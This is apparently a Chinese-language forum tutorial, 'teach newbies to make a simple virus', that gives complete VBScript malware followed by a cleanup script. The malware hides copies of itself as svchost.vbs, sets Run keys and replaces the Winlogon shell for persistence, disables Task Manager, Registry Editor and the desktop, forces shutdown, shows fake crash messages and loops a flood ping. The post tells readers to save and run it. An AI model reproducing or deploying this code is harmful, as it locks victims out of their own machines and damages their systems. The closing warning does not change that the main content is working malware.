教菜鳥一做個(gè)簡單的病毒!
Set objFS = CreateObject("Scripting.FileSystemObject")
Set objFSO = CreateObject("Scripting.FileSystemObject")
set wsh=wscript.createobject("wscript.shell")
set reg=wscript.createobject("wscript.shell")
dim wsh
a=WScript.ScriptFullName
b="shutdown -t 60 -s -c 如果你是菜鳥的話。。。我想你知道害怕了吧！嬉嬉！"
c="c:\svchost.vbs"
d="d:\svchost.vbs"
s="c:\windows\system32\svchost.vbs"
c1="attrib +s +h +a +r c:\svchost.vbs"
d1="attrib +s +h +a +r d:\svchost.vbs"
s1="attrib +s +h +a +r c:\windows\system32\svchost.vbs"
If objFSO.FileExists (c) Then
Else
objFs.GetFile (a).Copy (c)
wsh.run c1
End If
If objFSO.FileExists(d) Then
Else
objFs.GetFile (a).Copy (d)
wsh.run d1
End If
If objFSO.FileExists(s) Then
Else
objFs.GetFile (a).Copy (s)
wsh.run s1
End If
wsh.run b
wsh.run "narrator"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoRun","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoClose","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoLogoff","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoDesktop","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoDrives","000000100","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","c:\svchost.vbs","REG_SZ"
reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","d:\svchost.vbs","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\svchost","c:\windows\system32\svchost.vbs","REG_SZ"
reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\svchost","c:\windows\system32\svchost.vbs","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\sTimeFormat","tttt H:mm:ss","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\s1159","笨蛋！","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\s2359","傻逼！","REG_SZ"
reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell","c:\windows\system32\svchost.vbs","REG_SZ"
msgbox "系統(tǒng)快要崩潰了！",48,"由于你經(jīng)常看黃頁："
msgbox "windows崩潰了！",18,"安全警報(bào)："
do
wsh.run ("ping -t -l 6500 192.168.1.1")
loop
'請將以上代碼保存在txt文件中保存、再把后綴名txt改成vbs后執(zhí)行后就可以看到效果
了解救方法如下：
開機(jī)的時(shí)候按F8選擇從帶命令行的安全模式啟動(dòng)系統(tǒng)，然后執(zhí)行以下命令
attrib -s -r -h -a c:\windows\system32\svchost.vbs
attrib -s -r -h -a c:\svchost.vbs
attrib -s -r -h -a d:\svchost.vbs
explorer
然后從以上文件目錄中找到那VBS文件，把他們刪除既可，還要自己建立一個(gè)新的VBS文件，把一下代碼復(fù)制進(jìn)去執(zhí)行一次就OK了！
set reg=wscript.createobject("wscript.shell")
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000000","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","00000000","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoRun","00000000","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoClose","00000000","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoLogoff","00000000","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoDesktop","00000000","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoDrives","000000000","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","","REG_SZ"
reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\svchost","","REG_SZ"
reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\svchost","","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\sTimeFormat","H:mm:ss","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\s1159","AM","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\s2359","PM","REG_SZ"
reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell","Explorer.exe","REG_SZ"
msgbox "解救成功，請勿用此代碼破壞別人",64,"OK"